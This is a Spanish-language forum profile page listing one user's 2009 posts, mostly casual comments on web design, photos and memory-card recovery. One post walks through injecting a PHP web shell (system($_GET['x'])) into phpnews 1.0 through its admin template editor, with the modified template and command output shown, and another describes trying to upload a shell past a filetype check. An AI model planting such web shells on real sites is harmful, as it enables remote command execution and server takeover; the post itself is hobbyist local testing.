Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Azielito

#721
PHP / Re: include externo
28 Mayo 2009, 23:22 PM
usa el "traductor" de google, le dices traducir de "español" a "español" y pones la url :) no creo que bloqueen google :xD
#722
Para mi gusto falta codearla un poco mejor, tal vez usar patrones y cosillas de esas, o sea, quitar mas imagenes para eso de la carga y hacerlo sin tablitas, con css queda un tanto mejor

view-source:http://darioxhcx.webcindario.com/

en cuanto al diseño no tengo puntos de vista malos :D
#723
A mi aun que he perdido mucha practica, tengo varios diseños (copiados) de graffitis [o como se escriba :xD] del resto regalados :xD


WHK que bien dibujas ñ_ñ

me gusto el programador de php :xD

http://www.jccharry.com/portada/images/morfeoshow/dibujos_crea-1153/big/coder.png

No será un auto retrato? :xD
#724
Diseño Gráfico / Re: Galería fotográfica
27 Mayo 2009, 20:15 PM
excelentes fotos :D :D los filtros son de la camara o con photoshop? :-o
#725
Se ve bueno, tengo amigas un poco mas blanca que la que pones, haré un intento :xD
#726
llevas razón, si usa uno que lo maneja desde consola podria no esta montando bien el dispositivo [...]

Aun que, por la imagen que pone no dejas muchas opciones


En primera instancia se me ocurre windows, vista, luego XP con un theme de vista, y al final una distro de linux con un theme de vista ammm [...] me voy por Windows Vista :D aparte de la apariencia de la ventana él mismo lo dice en el primer post :xD
#727
es amm... excelente ñ_ñ'''


te quedo  muy bien, al igual que shell killer pienso lo mismo de tus trabajos :D
#728
Nivel Web / Re: CuteNews Escalar privilegios
26 Mayo 2009, 18:07 PM
'_' :-o

Excelente :0



Estaba confundiendo el sistema, con el que estaba haciendo pruebas era con phpnews, no se por que los confundí :xD

sorry ._________.  intentaré hacer lo mismo con este :-)




Ya, despues de varios intentos logre inyectar codigo php ñ_ñ'  siguiendo el tutorial que has puesto WHK :D

bien, basicamente es lo mismo solo que mejor :xD

vamos a editar el templete, yo escogí el de news.php, o sea, donde se muestran las noticias xD

:http://localhost/phpnews/phpnews1.0/index.php?action=modtemp

esto nos muestra lo siguiente
Código (php) [Seleccionar]
<h1>
                 $subject
              </h1>
              <p>
                 $time by $username.
              </p>
              <p>
                 <strong>$titletext</strong>
              </p>
              <p>
                 $maintext | $comments | $sendtofriend
              </p>
              <hr /><br />


Si vemos el archivo news_temp.php nos dirá todo

Código (php) [Seleccionar]
<?
print<<<EOT
<h1>
                 $subject
              </h1>
              <p>
                 $time by $username.
              </p>
              <p>
                 <strong>$titletext</strong>
              </p>
              <p>
                 $maintext | $comments | $sendtofriend
              </p>
              <hr /><br />
EOT;
?>


Cuando modificamos cualquier cosa desde el panel de administración lo refleja directamente en éste archivo ñ_ñ

Para finalizar, desde el panel de administración modificamos el template de modo que quede así:
Código (php) [Seleccionar]
<h1>
                 $subject
              </h1>
              <p>
                 $time by $username.
              </p>
              <p>
                 <strong>$titletext</strong>
              </p>
              <p>
                 $maintext | $comments | $sendtofriend
              </p>
              <hr /><br />
EOT;
system($_GET['x']);die();


Esto dará como resultado éste código en nuestro "news_temp.php"
Código (php) [Seleccionar]
<?
print<<<EOT
<h1>
                 $subject
              </h1>
              <p>
                 $time by $username.
              </p>
              <p>
                 <strong>$titletext</strong>
              </p>
              <p>
                 $maintext | $comments | $sendtofriend
              </p>
              <hr /><br />
EOT;
system($_GET['x']);die();
EOT;
?>


y tenemos magia x)

Cita de: http://localhost/ipm/phpnews/phpnews1.0/news.php?x=dir
Código (html4strict) [Seleccionar]
<script type="text/javascript">
<!--
       function sendtof(desktopURL)
       {
         desktop = window.open(desktopURL, "SendToFriend", "toolbar=no,location=no,status=no,menubar=no,scrollbars=no,width=400,height=275,resizable=no");
       }
// -->
</script>
<a name="2"><!-- 2 --></a>
<h1>
                 Siguiente prueba ñ_ñ
              </h1>
              <p>
                 December 02, 2008, 10:55:16 AM by admin.
              </p>
              <p>
                 <strong>titulo</strong>

              </p>
              <p>
                 <a href="?action=fullnews&amp;id=2">Full Story</a> |  | <a href="javascript:sendtof('http://localhost/phpnews/phpnews1.0/news.phpsendtofriend.php?mid=2')">Send To Friend</a>
              </p>
              <hr /><br /> El volumen de la unidad G es AZIELITO
El n£mero de serie del volumen es: 476A-3939

Directorio de G:\Desarrollo\web\www\phpnews\phpnews1.0

19/11/2008  05:55 p.m.    <DIR>          .
19/11/2008  05:55 p.m.    <DIR>          ..
20/06/2003  07:44 p.m.            17,716 gpl.txt
16/07/2003  05:05 p.m.             2,100 headlines.php
11/07/2003  06:07 p.m.               118 headlines_temp.php
16/07/2003  05:05 p.m.             4,578 help.php
16/07/2003  05:10 p.m.             7,980 index.php
18/06/2003  11:33 p.m.             2,891 mysql.sql
16/07/2003  05:06 p.m.            10,793 news.php
11/07/2003  02:22 p.m.             4,058 phpnews_package.css
16/07/2003  04:12 p.m.             8,857 readme.html
16/07/2003  04:24 p.m.            20,679 se.lng
16/07/2003  05:06 p.m.             5,247 sendtofriend.php
11/07/2003  06:07 p.m.             1,203 sendtofriend_temp.php
11/07/2003  06:07 p.m.               602 sent_temp.php
20/11/2008  09:13 a.m.               103 settings.php
19/11/2008  05:55 p.m.    <DIR>          smilies
08/04/2003  10:50 a.m.               837 bullet.gif
11/07/2003  06:07 p.m.               781 comment_temp.php
11/07/2003  06:07 p.m.               381 comments_temp.php
16/07/2003  04:24 p.m.            22,127 de.lng
16/07/2003  04:24 p.m.            20,272 en.lng
11/05/2003  04:29 p.m.               358 fullnews_temp.php
19/11/2008  05:55 p.m.            62,254 admin.php
16/07/2003  05:06 p.m.            19,086 install.php.bak
02/12/2008  11:28 a.m.                27 es.php
02/12/2008  11:35 a.m.             4,798 auth.php
26/05/2009  10:51 a.m.             1,344 phperror.log
26/05/2009  11:02 a.m.               391 news_temp.php
             26 archivos        219,581 bytes
              3 dirs  21,014,544,384 bytes libres


ñ_ñ

Gracias a WHK por el tuto anterior x)
#729
No deberia dar problemas por el SO, inserta la memoria con el adaptador y copia todo lo que puedas, si aun asi no se puede usa programas de recuperacion de datos y si no se puede mejor ve a comprar otra tarjeta :xD

Mira si la camara tiene la opcion de enviar por bluetooth ñ_ñ'
#730
Nivel Web / Re: CuteNews Escalar privilegios
26 Mayo 2009, 02:49 AM
aaaaaaaaa si, yo alguna vez (aun trato xD) intente de poner una shell, lo unico que encontre fue algo de un avatar pero lo "inserta" con html, o sea
Código (html4strict) [Seleccionar]
<img src=$URL_AVATAR>

¬¬ y yo lo hablilite para poder subir una shell (bypasseando el filetype XD) y nada, no encontre forma, y si pones codigo php en una "entrada" no lo interpreta como tal ¬¬

Ahora mismo no traigo mi server de pruebas pero mañana intento hacer algo de SQL en las entradas a ver si encuentro algo ñ_ñ'